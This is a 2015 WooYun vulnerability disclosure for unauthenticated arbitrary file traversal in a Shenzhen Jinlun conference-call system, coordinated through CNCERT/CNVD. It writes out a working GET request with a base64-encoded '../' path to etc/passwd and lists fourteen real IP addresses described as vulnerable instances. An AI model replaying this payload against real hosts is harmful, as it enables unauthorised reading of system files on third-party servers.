当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0121810

漏洞标题:某电话会议系统任意系统文件遍历(无需登录)

相关厂商:深圳市金伦科技有限公司

漏洞作者: YY-2012

提交时间:2015-06-20 23:00

修复时间:2015-09-22 15:04

公开时间:2015-09-22 15:04

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-20: 细节已通知厂商并且等待厂商处理中
2015-06-24: 厂商已经确认,细节仅向厂商公开
2015-06-27: 细节向第三方安全合作伙伴开放
2015-08-18: 细节向核心白帽子及相关领域专家公开
2015-08-28: 细节向普通白帽子公开
2015-09-07: 细节向实习白帽子公开
2015-09-22: 细节向公众公开

简要描述:

rt

详细说明:

深圳市金伦科技有限公司产品-会议通电话会议系统存在任意系统文件遍历。
发现登录时该系统会进行BASE64编码传输,由于过滤不严导致任意系统文件遍历。

GET /hyt/index.php?c=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n&d=VXNlclJlZw==&m=c3RhZmY= HTTP/1.1
Referer: https://59.33.255.14/
Cookie: PHPSESSID=hunogj8adv95r8n6sdena5fml0
Host: 59.33.255.14
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

漏洞证明:

aaaaaaaaaaaa11111111111.jpg


aaaaaaaaaa222222222222222222.jpg


aaaaaaaaaa333333333333.jpg


aaaaaaaaaaaa444444444444444.jpg


aaaaaaaaaaa5555555555555.jpg


案例:

https://59.33.255.14/hyt/index.php
http://222.46.80.245/hyt/index.php
https://120.86.119.50/hyt/index.php
https://61.234.104.211/hyt/index.php
https://123.65.216.44/hyt/index.php
https://183.234.78.34/hyt/index.php
https://114.247.232.100/hyt/index.php
https://61.234.125.186/hyt/index.php
http://180.168.130.19:8080/hyt/index.php
https://123.65.0.105/hyt/index.php
http://180.168.130.22/hyt/index.php
http://58.246.76.100/hyt/index.php
http://114.247.232.100/hyt/index.php
https://118.140.246.42/hyt/index.php

修复方案:

联系厂商。

版权声明:转载请注明来源 YY-2012@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-06-24 15:02

厂商回复:

CNVD确认并复现所述情况,已由CNVD通过软件生产厂商公开联系渠道向其邮件和电话通报,由其后续提供解决方案并协调相关用户单位处置。

最新状态:

暂无